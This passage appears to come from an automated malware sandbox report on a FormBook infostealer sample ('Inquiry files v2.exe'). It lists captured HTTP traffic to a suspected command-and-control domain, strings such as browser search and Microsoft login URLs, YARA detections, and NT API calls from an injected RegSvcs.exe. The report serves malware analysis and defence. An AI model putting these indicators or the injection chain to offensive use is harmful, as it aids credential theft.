3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Thu, 18 Jul 2024 05:58:21 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Thu, 18 Jul 2024 05:58:24 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Thu, 18 Jul 2024 05:58:26 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 18 Jul 2024 05:58:49 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCF-Ray: 8a503df80991c3f3-EWRCF-Cache-Status: DYNAMICCache-Control: no-cache, must-revalidate, max-age=0Content-Encoding: gzipExpires: Wed, 11 Jan 1984 05:00:00 GMTLink: <https://goodneighbor.club/wp-json/>; rel="https://api.w.org/"Vary: Accept-Encodingki-cache-type: NoneKi-CF-Cache-Status: BYPASSki-edge: v=20.2.7;mv=3.0.6ki-origin: g1pX-Content-Type-Options: nosniffX-Edge-Location-Klb: 1Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SEQf5%2FIrQiQoCKW%2FBybMEY41uWUgUEQS7raVchR2BnLK1CgurKUN0mU%2FOMTVQ1%2BqFQSOm40h3LJ1hwTW0ZICJXmRoZuR%2BrEvdD4U8OB8q0EiWa%2Fuh6110%2Fw3cNWwurO5d2R6I55Yug%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server: cloudflarealt-svc: h3=":443"; ma=86400Data Raw: 33 35 35 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd eb 9a db 38 92 28 f8 db fe be 7d 07 9a e5 4a 49 9d 24 53 52 5e 6c 4b 96 7d 5c 2e 57 b7 67 7c a9 f5 a5 fb f4 38 fd e9 50 22 a5 a4 4d 89 6a 92 ca 74 b6 ac 7d 8d 7d a0 7d b1 8d 0b 00 82 37 5d 32 5d 3d 33 df 39 ae ee 14 09 04 02 81 40 20 10 11 00 81 c7 f7 bc 68 9c 5e 2f 7c e3 22 9d 85 4f ee 3e c6 1f 23 74 e7 d3 81 e9 cf ed 8f ef 4d 4c f3 5d ef c9 dd 3b 8f 67 7e ea 1a e3 0b 37 4e fc 74 60 7e fc f0 9b fd d0 54 e9 73 77 e6 0f cc cb c0 bf 5a 44 71 6a 1a e3 68 9e fa 73 80 bb 0a bc f4 62 e0 f9 97 c1 d8 b7 e9 c5 32 82 79 90 06 6e 68 27 63 37 f4 07 1d c2 12 06 f3 af 46 ec 87 03 73 11 47 93 20 f4 4d e3 22 f6 27 03 f3 22 4d 17 49 ef e8 68 3a 5b 4c 9d 28 9e 1e 7d 9b cc 8f 3a 5c 28 0d d2 d0 7f f2 bb 3b f5 8d 79 94 1a 93 68 39 f7 8c 83 9f 1e 76 3b 9d be f1 e7 28 f2 8c 37 7e Data Ascii: 35568(}JI$SR^lK}\.Wg|8P"Mjt}}}7]2]=39@ h^/|"O>#tML];g~7Nt`~TswZDqjhsb2ynh'c7FsG M"'"MIh:[L(}:\(;yh9v;(7~
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 18 Jul 2024 05:58:51 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCF-Ray: 8a503e082d0d4246-EWRCF-Cache-Status: DYNAMICCache-Control: no-cache, must-revalidate, max-age=0Content-Encoding: gzipExpires: Wed, 11 Jan 1984 05:00:00 GMTLink: <https://goodneighbor.club/wp-json/>; rel="https://api.w.org/"Vary: Accept-Encodingki-cache-type: NoneKi-CF-Cache-Status: BYPASSki-edge: v=20.2.7;mv=3.0.6ki-origin: g1pX-Content-Type-Options: nosniffX-Edge-Location-Klb: 1Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ad0W2w0wl6If6OWHGdWt13wNg%2BIKcMVl3xFBOM4VB72RaAXN67ITfJ7x%2BhWgwldMTC%2FIiNRbS2lWx2wf8rBFSpFkq6vUnihvUfSUcXS1cHake1zvFsMBAbBB2THdrosZhi7s4D6ZjA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server: cloudflarealt-svc: h3=":443"; ma=86400Data Raw: 64 63 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd eb 9a db 38 92 28 f8 db fe be 7d 07 9a e5 4a 49 9d 24 53 52 5e 6c 4b 96 7d 5c 2e 57 b7 67 7c a9 f5 a5 fb f4 38 fd e9 50 22 a5 a4 4d 89 6a 92 ca 74 b6 ac 7d 8d 7d a0 7d b1 8d 0b 00 82 37 5d 32 5d 3d 33 df 39 ae ee 14 09 04 02 81 40 20 10 11 00 81 c7 f7 bc 68 9c 5e 2f 7c e3 22 9d 85 4f ee 3e c6 1f 23 74 e7 d3 81 e9 cf ed 8f ef 4d 4c f3 5d ef c9 dd 3b 8f 67 7e ea 1a e3 0b 37 4e fc 74 60 7e fc f0 9b fd d0 54 e9 73 77 e6 0f cc cb c0 bf 5a 44 71 6a 1a e3 68 9e fa 73 80 bb 0a bc f4 62 e0 f9 97 c1 d8 b7 e9 c5 32 82 79 90 06 6e 68 27 63 37 f4 07 1d c2 12 06 f3 af 46 ec 87 03 73 11 47 93 20 f4 4d e3 22 f6 27 03 f3 22 4d 17 49 ef e8 68 3a 5b 4c 9d 28 9e 1e 7d 9b cc 8f 3a 5c 28 0d d2 d0 7f f2 bb 3b f5 8d 79 94 1a 93 68 39 f7 8c 83 9f 1e 76 3b 9d be f1 e7 28 f2 8c 37 7e 30 bd 18 45 b1 f1 3c 5c 8e Data Ascii: dc08(}JI$SR^lK}\.Wg|8P"Mjt}}}7]2]=39@ h^/|"O>#tML];g~7Nt`~TswZDqjhsb2ynh'c7FsG M"'"MIh:[L(}:\(;yh9v;(7~0E<\
                Source: Inquiry files v2.exe, WOzeoJQi.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                Source: Inquiry files v2.exe, WOzeoJQi.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                Source: Inquiry files v2.exe, WOzeoJQi.exe.0.drString found in binary or memory: http://ocsp.comodoca.com0
                Source: Inquiry files v2.exe, 00000000.00000002.2222224307.0000000003027000.00000004.00000800.00020000.00000000.sdmp, WOzeoJQi.exe, 00000009.00000002.2482574728.00000000027F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: Inquiry files v2.exe, 00000000.00000002.2222224307.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, WOzeoJQi.exe, 00000009.00000002.2482574728.000000000279C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/AppRepairsDataSet.xsd
                Source: Inquiry files v2.exe, WOzeoJQi.exe.0.drString found in binary or memory: http://tempuri.org/AppRepairsDataSet.xsdkNo
                Source: YIJBuAgnqfKMtZ.exe, 0000000F.00000002.3374402396.00000000016DB000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.goodneighbor.club
                Source: YIJBuAgnqfKMtZ.exe, 0000000F.00000002.3374402396.00000000016DB000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.goodneighbor.club/qt04/
                Source: runas.exe, 00000010.00000003.2912720392.00000000080DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: runas.exe, 00000010.00000003.2912720392.00000000080DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: runas.exe, 00000010.00000003.2912720392.00000000080DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: runas.exe, 00000010.00000003.2912720392.00000000080DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: runas.exe, 00000010.00000003.2912720392.00000000080DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: runas.exe, 00000010.00000003.2912720392.00000000080DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: runas.exe, 00000010.00000003.2912720392.00000000080DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: runas.exe, 00000010.00000002.3372111139.0000000003094000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: runas.exe, 00000010.00000002.3372111139.0000000003094000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: runas.exe, 00000010.00000003.2890424029.00000000080BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: runas.exe, 00000010.00000002.3372111139.0000000003094000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: runas.exe, 00000010.00000002.3372111139.0000000003094000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=10338
                Source: runas.exe, 00000010.00000002.3372111139.0000000003094000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: runas.exe, 00000010.00000002.3372111139.0000000003094000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: Inquiry files v2.exe, WOzeoJQi.exe.0.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                Source: runas.exe, 00000010.00000003.2912720392.00000000080DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: runas.exe, 00000010.00000003.2912720392.00000000080DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000F.00000002.3374402396.0000000001680000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.3371782022.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2580516163.0000000003810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.3374604831.0000000004AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2569102143.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.3374530028.0000000004A90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.3375661404.00000000031C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2571952435.0000000001620000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 7.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 0000000F.00000002.3374402396.0000000001680000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000010.00000002.3371782022.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000007.00000002.2580516163.0000000003810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000010.00000002.3374604831.0000000004AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000007.00000002.2569102143.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000010.00000002.3374530028.0000000004A90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 0000000F.00000002.3375661404.00000000031C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000007.00000002.2571952435.0000000001620000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0042BE53 NtClose,7_2_0042BE53
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012F2B60 NtClose,LdrInitializeThunk,7_2_012F2B60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012F2DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_012F2DF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012F2C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_012F2C70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012F35C0 NtCreateMutant,LdrInitializeThunk,7_2_012F35C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012F4340 NtSetContextThread,7_2_012F4340
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012F4650 NtSuspendThread,7_2_012F4650
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012F2BA0 NtEnumerateValueKey,7_2_012F2BA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012F2B80 NtQueryInformationFile,7_2_012F2B80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012F2BE0 NtQueryValueKey,7_2_012F2BE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_012F2BF0 NtAllocateVirtualMemory,7_2_012F2BF0
